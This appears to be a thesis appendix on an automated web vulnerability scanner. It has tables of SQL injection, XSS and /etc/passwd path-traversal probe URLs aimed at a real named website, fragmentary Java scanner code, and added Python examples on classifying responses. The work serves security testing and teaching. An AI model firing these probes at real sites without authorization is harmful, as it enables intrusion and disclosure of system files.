Detecting Security Vulnerabilities in Web Applications through Data Validation Testing (Pendeteksi Celah Keamanan pada Aplikasi WEB dengan Penerapan Testing Menggunakan Data Validation Testing)

Academic year: 2019


APPENDIX A: Tables

1. Table 4.7 Crawl results for sample 1

No.  Website URL
1    http://www.raahauges.com/index.php
2    http://www.raahauges.com/supporters.php
3    http://www.raahauges.com/shotgun-range.php
4    http://www.raahauges.com/hunting.php
5    http://www.raahauges.com/sports-fair.php
6    http://www.raahauges.com/events-calendar.php
7    http://www.raahauges.com/contact.php
8    http://www.raahauges.com/news.php
9    http://www.raahauges.com/shoot-results.php
10   http://www.raahauges.com/find-raahauges.php
11   http://www.raahauges.com/view-news.php?id=9
12   http://www.raahauges.com/view-news.php?id=8
13   http://www.raahauges.com/view-news.php?id=10
14   http://www.raahauges.com/SportsFairFlyer2014.pdf
15   http://www.raahauges.com/index.php?prm=09&chm=-1#mini-calendar
16   http://www.raahauges.com/index.php?prm=09&chm=1#mini-calendar
17   http://www.raahauges.com/events-calendar.php?d=2014-09-13
18   http://www.raahauges.com/events-calendar.php?d=2014-09-14
19   http://www.raahauges.com/events-calendar.php?d=2014-09-17
20   http://www.raahauges.com/events-calendar.php?d=2014-09-18
21   http://www.raahauges.com/events-calendar.php?d=2014-09-19
22   http://www.raahauges.com/events-calendar.php?d=2014-09-20
23   http://www.raahauges.com/events-calendar.php?d=2014-09-21

2. Table 4.8 Results of the SQL Injection attack scenario, sample 1

Payload: %27 (a single quote), appended to the end of each crawled URL.

No.  Manipulated website URL
1    http://www.raahauges.com/index.php%27
2    http://www.raahauges.com/supporters.php%27
3    http://www.raahauges.com/shotgun-range.php%27
4    http://www.raahauges.com/hunting.php%27
5    http://www.raahauges.com/sports-fair.php%27
6    http://www.raahauges.com/events-calendar.php%27
7    http://www.raahauges.com/contact.php%27
8    http://www.raahauges.com/news.php%27
9    http://www.raahauges.com/shoot-results.php%27
10   http://www.raahauges.com/find-raahauges.php%27
11   http://www.raahauges.com/view-news.php?id=9%27
12   http://www.raahauges.com/view-news.php?id=8%27
13   http://www.raahauges.com/view-news.php?id=10%27
14   http://www.raahauges.com/SportsFairFlyer2014.pdf%27
15   http://www.raahauges.com/index.php?prm=09&chm=-1#mini-calendar%27
16   http://www.raahauges.com/index.php?prm=09&chm=1#mini-calendar%27
17   http://www.raahauges.com/events-calendar.php?d=2014-09-13%27
18   http://www.raahauges.com/events-calendar.php?d=2014-09-14%27
19   http://www.raahauges.com/events-calendar.php?d=2014-09-17%27
20   http://www.raahauges.com/events-calendar.php?d=2014-09-18%27
21   http://www.raahauges.com/events-calendar.php?d=2014-09-19%27
22   http://www.raahauges.com/events-calendar.php?d=2014-09-20%27
23   http://www.raahauges.com/events-calendar.php?d=2014-09-21%27

3. Table 4.9 Results of the Cross Site Scripting attack scenario, sample 1

Payload: %20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E, which decodes to  '><h1>Testing</h1>, appended to the end of each crawled URL.

No.  Manipulated website URL
1    http://www.raahauges.com/index.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
2    http://www.raahauges.com/supporters.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
3    http://www.raahauges.com/shotgun-range.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
4    http://www.raahauges.com/hunting.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
5    http://www.raahauges.com/sports-fair.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
6    http://www.raahauges.com/events-calendar.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
7    http://www.raahauges.com/contact.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
8    http://www.raahauges.com/news.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
9    http://www.raahauges.com/shoot-results.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
10   http://www.raahauges.com/find-raahauges.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
11   http://www.raahauges.com/view-news.php?id=9%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
12   http://www.raahauges.com/view-news.php?id=8%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
13   http://www.raahauges.com/view-news.php?id=10%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
14   http://www.raahauges.com/SportsFairFlyer2014.pdf%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
15   http://www.raahauges.com/index.php?prm=09&chm=-1#mini-calendar%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
16   http://www.raahauges.com/index.php?prm=09&chm=1#mini-calendar%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
17   http://www.raahauges.com/events-calendar.php?d=2014-09-13%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
18   http://www.raahauges.com/events-calendar.php?d=2014-09-14%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
19   http://www.raahauges.com/events-calendar.php?d=2014-09-17%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
20   http://www.raahauges.com/events-calendar.php?d=2014-09-18%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
21   http://www.raahauges.com/events-calendar.php?d=2014-09-19%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
22   http://www.raahauges.com/events-calendar.php?d=2014-09-20%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
23   http://www.raahauges.com/events-calendar.php?d=2014-09-21%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
24   http://www.raahauges.com/events-calendar.php?d=2014-09-28%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E

4. Table 4.10 Results of the File Inclusion attack scenario, sample 1

Payload: ../../../../../../../../../../etc/passwd, appended to the end of each crawled URL.

No.  Manipulated website URL
1    http://www.raahauges.com/index.php../../../../../../../../../../etc/passwd
2    http://www.raahauges.com/supporters.php../../../../../../../../../../etc/passwd
3    http://www.raahauges.com/shotgun-range.php../../../../../../../../../../etc/passwd
4    http://www.raahauges.com/hunting.php../../../../../../../../../../etc/passwd
5    http://www.raahauges.com/sports-fair.php../../../../../../../../../../etc/passwd
6    http://www.raahauges.com/events-calendar.php../../../../../../../../../../etc/passwd
7    http://www.raahauges.com/contact.php../../../../../../../../../../etc/passwd
8    http://www.raahauges.com/news.php../../../../../../../../../../etc/passwd
10   http://www.raahauges.com/find-raahauges.php../../../../../../../../../../etc/passwd
11   http://www.raahauges.com/view-news.php?id=9../../../../../../../../../../etc/passwd
12   http://www.raahauges.com/view-news.php?id=8../../../../../../../../../../etc/passwd
13   http://www.raahauges.com/view-news.php?id=10
14   http://www.raahauges.com/SportsFairFlyer2014.pdf../../../../../../../../../../etc/passwd
15   http://www.raahauges.com/index.php?prm=09&chm=-1#mini-calendar../../../../../../../../../../etc/passwd
16   http://www.raahauges.com/index.php?prm=09&chm=1#mini-calendar../../../../../../../../../../etc/passwd
17   http://www.raahauges.com/events-calendar.php?d=2014-09-13../../../../../../../../../../etc/passwd
18   http://www.raahauges.com/events-calendar.php?d=2014-09-14../../../../../../../../../../etc/passwd
19   http://www.raahauges.com/events-calendar.php?d=2014-09-17../../../../../../../../../../etc/passwd
20   http://www.raahauges.com/events-calendar.php?d=2014-09-18../../../../../../../../../../etc/passwd
21   http://www.raahauges.com/events-calendar.php?d=2014-09-19../../../../../../../../../../etc/passwd
22   http://www.raahauges.com/events-calendar.php?d=2014-09-20../../../../../../../../../../etc/passwd
23   http://www.raahauges.com/events-calendar.php?d=2014-09-21../../../../../../../../../../etc/passwd
24   http://www.raahauges.com
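How the manipulated URLs in Tables 4.8 to 4.10 are built, shown as an added Python illustration that is not part of the thesis or its Java tool. The scanner appends an already-encoded payload to the end of each crawled URL. That places it inside a parameter value only when a parameter happens to be last (view-news.php?id=9%27); for a bare path (news.php%27) it asks the web server for a file that does not exist, and for rows 15 and 16 it lands behind the #mini-calendar fragment, which an HTTP client never puts on the wire, so those two requests reach the server unmodified. The example contrasts this with parameter-targeted placement and shows the request target that is actually transmitted. The host and paths are the ones from Table 4.7; the function names are chosen here.

```python
"""Payload placement for URL-based injection probes.

Added example, not the thesis's Java code. Host and paths come from
Table 4.7; function names are chosen for this illustration.
"""
from __future__ import annotations

from urllib.parse import parse_qsl, quote, urlencode, urlsplit, urlunsplit

# Decoded forms of the three payloads used in Tables 4.8 to 4.10.
SQLI_PAYLOAD = "'"                          # sent as %27
XSS_PAYLOAD = " '><h1>Testing</h1>"          # sent as %20%27%3E%3C...
LFI_PAYLOAD = "../" * 10 + "etc/passwd"      # sent unencoded


def naive_append(url: str, encoded_payload: str) -> str:
    """The appendix's construction: the encoded payload is glued onto the end
    of the crawled URL, whatever its last component happens to be."""
    return url + encoded_payload


def request_target(url: str) -> str:
    """Path and query as they appear in the HTTP request line. The fragment
    (everything from '#') is client-side only and is never transmitted, so a
    payload placed after it exercises nothing on the server."""
    parts = urlsplit(url)
    return parts.path + ("?" + parts.query if parts.query else "")


def inject(url: str, payload: str) -> list[str]:
    """Place the payload where server-side code will actually read it: one test
    URL per query parameter (payload appended to that value), or the payload
    appended to the path when there is no query string. The fragment is dropped
    because it is never sent."""
    parts = urlsplit(url)._replace(fragment="")
    if not parts.query:
        return [urlunsplit(parts._replace(path=parts.path + quote(payload, safe="/")))]
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    urls = []
    for target in range(len(pairs)):
        mutated = [(k, v + payload if idx == target else v)
                   for idx, (k, v) in enumerate(pairs)]
        query = urlencode(mutated, safe="/", quote_via=quote)   # '/' kept for ../ traversal
        urls.append(urlunsplit(parts._replace(query=query)))
    return urls


if __name__ == "__main__":
    crawled = "http://www.raahauges.com/index.php?prm=09&chm=-1#mini-calendar"
    print("appendix row 15:", naive_append(crawled, "%27"))
    print("  on the wire  :", request_target(naive_append(crawled, "%27")))
    for test_url in inject(crawled, SQLI_PAYLOAD):
        print("targeted       :", test_url, "->", request_target(test_url))
```

Run stand-alone, the script prints the Table 4.8 form of row 15 next to the request line it produces (the quote is gone) and the two parameter-targeted variants that do carry it.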

APPENDIX B: Application Source Code Excerpts

1. AutoScannerSQLI.java

public class AutoScannerSQLI extends javax.swing.JFrame {
    private String save[] = new String[250];      // crawled URLs queued for testing
    private String testBasic = "";
    private String testBlind = "";
    private String testBlind2 = "";
    private int hasilPencarian = 0;                // number of URLs reported vulnerable
    private String inputURL = "";

    ArrayList<String> listOfReportsVulnerable = new ArrayList<String>();
    ArrayList<String> listOfReports = new ArrayList<String>();

    read_byPassHttpError identifikasi = new read_byPassHttpError(null);

    // Scan button handler (excerpt)
    listOfReportsVulnerable = new ArrayList<String>(0);
    listOfReports = new ArrayList<String>(0);
    inputURL = url_Site.getText();
    String typeAttack = tipeSerangan.getSelectedItem().toString();

    // Check that the URL is well-formed before scanning
    if ((verifyUrl(inputURL) != null) && (typeAttack != null)) {
        JOptionPane.showMessageDialog(null, "Scan Mulai");
        hasilScanSQLi.append("Situs yang di scan " + inputURL + " \n");
        hasilScanSQLi.append("Jenis Serangan SQL Injection \n" + "tipe serangan : " + typeAttack + "\n");
        listOfReportsVulnerable.add("Tipe serangan : " + typeAttack + "\n");
    } else {

    }

    // Crawler (excerpt): collect every <a href> on the fetched page
    Elements links = doc.select("a[href]");
    int i = 0;

    } catch (IOException e) {
        e.printStackTrace();
    }
}

// Attack scenario: boolean-based blind SQL injection. The first probe should leave
// the page unchanged and the second should alter it; a URL whose two responses are
// identical, or equal in size, is reported as not vulnerable.
private void attackScenarioBlindTrue() {
    String serangan1 = "%20and%201=1--";
    String serangan2 = "%20and%201=0--";
    int size1 = 0, size2 = 0;

    if ((hasilIdentifikasiTrue.equals(hasilIdentifikasiFalse)) || (size1 == size2)) {
        hasilScanSQLi.append(save[i] + " => " + "Tidak Vulnerable\n");
        listOfReportsVulnerable.add(save[i] + " => " + "Tidak Vulnerable\n");
    } else {

        listOfReportsVulnerable.add(save[i] + " => " + "Vulnerable");

private void attackScenarioBlindFalse(String serangan) {
    for (int i = 0; i < save.length; i++) {

// Fingerprinting: identify the back-end database server from its responses
// Analyse the response to decide whether the URL is vulnerable or not
private void readResponAttack(String SQLTest) {

2. AutoScannerXSS.java

public class AutoScannerXSS extends javax.swing.JFrame {
    private String listUrlXSS[] = new String[250];   // crawled URLs queued for testing
    private String hasilRead = "";
    private String tipeAttack = "";                   // payload chosen in the GUI, decoded form
    private int hasilPencarian = 0;

    ArrayList<String> listOfReportsVulnerable = new ArrayList<String>();
    ArrayList<String> listOfReports = new ArrayList<String>();

    public AutoScannerXSS() {
        initComponents();
    }

    private void scanXSSActionPerformed(java.awt.event.ActionEvent evt) {
        String situs = urlXSS.getText();

            // URL-encoded form of  '><h1>Testing</h1>  (the payload of Table 4.9)
            attackScenarioXSS("%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E");
        } else if (tipeAttack.equals("<script>alert(123)</script>")) {
            attackScenarioXSS("%20<script>alert(123)</script>");
        } else if (tipeAttack.equals("'<script>alert(123);</script>")) {
            attackScenarioXSS("%20'<script>alert(123);</script>");
        }
    }

    private void attackScenarioXSS(String serangan) {
        for (int i = 0; i < listUrlXSS.length; i++) {
            if (listUrlXSS[i] != null) {
                // String testXSS = listUrlXSS[i] + serangan;
                // listUrlXSS2[i] = listUrlXSS[i] + serangan;
                // readResponAttack(testXSS);
                byPassError(listUrlXSS[i], serangan);
            } else {
                break;
            }
        }
    }

    // Fetch the probe URL and look for the payload in the response.
    private void readResponAttack(String SQLTest) {
        try { // needs the http:// scheme
            // Search the raw body (org.jsoup.Connection.Response.body()), not doc.body().text().
            // text() returns the parsed DOM: an unescaped <h1> becomes an element and only
            // "Testing" survives, while an HTML-encoded (safe) reflection decodes back into the
            // payload. Matching on text() therefore flags the safe case and misses the real one.
            Connection.Response res = Jsoup.connect(SQLTest).timeout(5000)
                    .ignoreHttpErrors(true).followRedirects(true)
                    .userAgent("Mozilla").execute();
            Document doc = res.parse();
            String title = doc.title();
            System.out.println("title : " + title);
            String isi = res.body();

            // Pattern.quote: the payloads contain regex metacharacters such as ( and )
            Pattern p = Pattern.compile(Pattern.quote(tipeAttack));
            Matcher m = p.matcher(isi);
            boolean found = false;
            while (m.find()) {
                found = true;
                System.out.println("Match Found \n" + m.group() + " at position " + m.start());
            }
            if (found) {
                hasilXSS.append(" Vulnerable");
            } else {
                hasilXSS.append("NO Vulnerable");
            }
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

3. AutoScannerFileInclusion.java

public class AutoScannerFileInclusion extends javax.swing.JFrame {
    private String listUrl[] = new String[250];   // crawled URLs queued for testing
    private String inputURL = "";
    private int hasilPencarian = 0;               // number of URLs reported vulnerable

    ArrayList<String> listOfReportsVulnerable = new ArrayList<String>();
    ArrayList<String> listOfReports = new ArrayList<String>();

    public AutoScannerFileInclusion() {
        initComponents();
    }

    // Scan button handler (excerpt)
    listOfReportsVulnerable = new ArrayList<String>(0);
    listOfReports = new ArrayList<String>(0);
    inputURL = url_Site.getText();
    String serangan = tipeSerangan.getSelectedItem().toString();

    if ((verifyUrl(inputURL) != null) && (serangan != null)) {
        JOptionPane.showMessageDialog(null, "Scan Mulai");
        hasilScan.append("Situs yang di scan " + inputURL + " \n");
        hasilScan.append("Jenis Serangan File Inclusion \n" + "Tipe serangan : " + serangan + "\n");
    } else {
        JOptionPane.showMessageDialog(null, "The entered URL is not valid. Please enter again:");
        url_Site.requestFocus();
        return;   // without this the crawl below still runs on the rejected input
    }

    websiteCrawler(inputURL);

    // Attack phase: the traversal string is appended to every crawled URL
    if (serangan.equals("File Inclusion")) {
        attackScenarioFileInclusion("../");
        tampil();
    } else if (serangan.equals("File Inclusion with Null")) {
        attackScenarioFileInclusion("../%00");   // null byte: truncates a suffix the server appends (old PHP)

    // websiteCrawler (excerpt): fetch the start page and keep the same-site links
            .ignoreHttpErrors(true).followRedirects(true)
            .userAgent("Mozilla").get();
        // get page title
        String title = doc.title();
        // System.out.println("title : " + title);
        // get all links
        Elements links = doc.select("a[href]");
        int i = 0;
        for (Element link : links) {
            // System.out.println("\nlink : " + link.attr("abs:href"));
            if (link.attr("abs:href").contains(url)) {   // stay in scope: same site only
                if (i >= listUrl.length) break;           // the array holds at most 250 URLs
                listUrl[i] = link.attr("abs:href");
                i++;
            }
        }
    } catch (IOException e) {
        e.printStackTrace();
    }
}

// Attack scenario (Data Validation Testing)
private void attackScenarioFileInclusion(String serangan) {
    for (int i = 0; i < listUrl.length; i++) {
        if (listUrl[i] != null) {
            String testFileInclusion = listUrl[i];
            byPassError(testFileInclusion, serangan);
        } else {
            break;
        }
    }
}

// Fingerprint the back-end from its response (written by Indra Nababan)
public void byPassError(String url, String serangan) {
    String s = url + serangan;   // payload appended to the whole URL, after any query string or fragment
    BufferedReader in = null;
    try {
        URL obj = new URL(s);
        HttpURLConnection conn = (HttpURLConnection) obj.openConnection();
        conn.setReadTimeout(5000);   // 0 would mean "wait forever" on a stalled server
        conn.setRequestProperty("User-Agent", "Mozilla/5.0 ( compatible ) ");
        conn.setRequestProperty("Accept", "*/*");
        System.out.println("Request URL ... " + s);

        boolean redirect = false;
        // normally, 3xx is redirect
        int status = conn.getResponseCode();
        if (status != HttpURLConnection.HTTP_OK) {
            if (status == HttpURLConnection.HTTP_MOVED_TEMP
                    || status == HttpURLConnection.HTTP_MOVED_PERM
                    || status == HttpURLConnection.HTTP_SEE_OTHER) {
                redirect = true;
            }
        }
        System.out.println("Response Code ... " + status);

        if (redirect) {
            // get redirect url from "location" header field
            String newUrl = conn.getHeaderField("Location");
            // get the cookie if need, for login
            String cookies = conn.getHeaderField("Set-Cookie");
            // open the new connection again
            conn = (HttpURLConnection) new URL(newUrl).openConnection();
            if (cookies != null) {
                // Set-Cookie carries attributes (Path, Expires, ...); only name=value is sent back
                conn.setRequestProperty("Cookie", cookies.split(";", 2)[0]);
            }
            conn.setRequestProperty("User-Agent", "Mozilla/5.0 ( compatible ) ");
            conn.setRequestProperty("Accept", "*/*");
            System.out.println("Redirect to URL : " + newUrl);
        }

        // The normal input stream does not work for 4xx/5xx; read the error stream instead.
        // Read from conn, not obj.openStream(): that would issue a second request to the
        // original URL and discard the redirect followed above.
        boolean isError = conn.getResponseCode() >= 400;
        if (isError) {
            in = new BufferedReader(new InputStreamReader(conn.getErrorStream()));
        } else {
            in = new BufferedReader(new InputStreamReader(conn.getInputStream()));
        }

        String inputLine;
        StringBuilder html = new StringBuilder();
        while ((inputLine = in.readLine()) != null) {
            html.append(inputLine + "\n");
        }
        in.close();
        String hasil = html.toString();

        // "<b>Warning</b>" is how PHP formats a warning when display_errors is on, e.g.
        // "<b>Warning</b>: include(...): failed to open stream". It shows the server choked on
        // the traversal string and leaks diagnostics; on its own it does not prove that the
        // target file was included.
        Pattern p = Pattern.compile("<b>Warning</b>");
        Matcher m = p.matcher(hasil);
        if (m.find()) {
            hasilScan.append(s + " => " + "VULNERABLE" + "\n");
            listOfReportsVulnerable.add(url + " => " + "VULNERABLE" + "\n");
            listOfReports.add(url + " => " + "VULNERABLE" + "\n");
            hasilPencarian += 1;
        } else {
            hasilScan.append(s + " => " + "Not Vulnerable\n");
            listOfReports.add(url + " => " + "Not VULNERABLE" + "\n");
        }
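Reading the probe responses, as an added Python example rather than the thesis's Java. It covers the three decisions the excerpts above make and the caveat each one needs: a reflected XSS probe has to be looked for in the raw body, because a parsed DOM's text() turns an unescaped <h1> into an element and decodes an entity-encoded (safe) reflection back into the payload, inverting the verdict; a boolean-blind pair (and 1=1 versus and 1=0) should be compared against the unmodified page, not only against each other; and <b>Warning</b> only shows that PHP printed an error, whereas disclosure is proven by the contents of /etc/passwd coming back. All response bodies are constructed here for illustration; the function names and the 0.95 similarity threshold are choices made for this example.

```python
"""Classify scanner responses for XSS, boolean-blind SQLi and file inclusion.

Added example (Python), not the thesis's Java scanner. Every response body
below is constructed for illustration.
"""
from __future__ import annotations

import html
import re
from difflib import SequenceMatcher

XSS_PROBE = " '><h1>Testing</h1>"     # decoded form of the Table 4.9 payload
PASSWD_LINE = re.compile(r"^root:[^:\n]*:0:0:", re.MULTILINE)
PHP_WARNING = "<b>Warning</b>"        # the marker byPassError() greps for


def xss_verdict(raw_body: str, probe: str = XSS_PROBE) -> str:
    """Search the raw HTTP body, not a parsed DOM's text().

    reflected-raw     : probe present verbatim, the markup was injected
    reflected-escaped : probe only appears after entity decoding, so output
                        encoding is in place (the case a text() check mistakes for a hit)
    not-reflected     : the input did not come back at all
    """
    if probe in raw_body:
        return "reflected-raw"
    if probe in html.unescape(raw_body):
        return "reflected-escaped"
    return "not-reflected"


def similarity(a: str, b: str) -> float:
    return SequenceMatcher(None, a, b).ratio()


def blind_sqli_verdict(baseline: str, true_body: str, false_body: str,
                       threshold: float = 0.95) -> bool:
    """Boolean-based blind check anchored on the unmodified page: '... and 1=1--'
    must leave it essentially unchanged and '... and 1=0--' must change it.
    Comparing only the two probe responses to each other cannot separate an
    injectable parameter from a page that differs a little on every request."""
    return (similarity(baseline, true_body) >= threshold
            and similarity(baseline, false_body) < threshold)


def lfi_verdict(raw_body: str) -> str:
    """file-disclosed   : a root line from /etc/passwd came back, inclusion worked
    php-warning-only : PHP echoed an error (display_errors on); diagnostics leak
                       but the file was not served
    no-evidence      : nothing to report"""
    if PASSWD_LINE.search(raw_body):
        return "file-disclosed"
    if PHP_WARNING in raw_body:
        return "php-warning-only"
    return "no-evidence"


# Constructed sample bodies (not captured from any real site).
ARTICLE = "<h1>Range News</h1><p>Sports fair flyer posted.</p>"
EMPTY_ARTICLE = "<h1>Range News</h1><p></p>"
REFLECTED_RAW = "<a href='/view-news.php?id=9 '><h1>Testing</h1>'>back</a>"
REFLECTED_ESCAPED = "<a href='/view-news.php?id=9 &#039;&gt;&lt;h1&gt;Testing&lt;/h1&gt;'>back</a>"
PASSWD_DUMP = "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
PHP_ERROR = ("<br />\n<b>Warning</b>:  include(../../etc/passwd): failed to open stream"
             " in <b>/var/www/index.php</b> on line <b>3</b><br />")


def demo() -> dict[str, object]:
    """Run each classifier on the constructed bodies."""
    return {
        "xss_raw": xss_verdict(REFLECTED_RAW),
        "xss_escaped": xss_verdict(REFLECTED_ESCAPED),
        "xss_none": xss_verdict(ARTICLE),
        # true probe returns the article, false probe returns an emptied page
        "blind_injectable": blind_sqli_verdict(ARTICLE, ARTICLE, EMPTY_ARTICLE),
        # both probes differ from the baseline only by a per-request timing comment
        "blind_dynamic_page": blind_sqli_verdict(
            ARTICLE + "<!-- generated in 9 ms -->",
            ARTICLE + "<!-- generated in 12 ms -->",
            ARTICLE + "<!-- generated in 8 ms -->"),
        "lfi_disclosed": lfi_verdict(PASSWD_DUMP),
        "lfi_warning": lfi_verdict(PHP_ERROR),
        "lfi_none": lfi_verdict(ARTICLE),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:20} {verdict}")
```

The escaped reflection is the one worth watching: it is exactly what a page that calls htmlspecialchars() returns, and a detector that reads the parsed text would report it as vulnerable while reporting the genuinely injected <h1> as clean.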
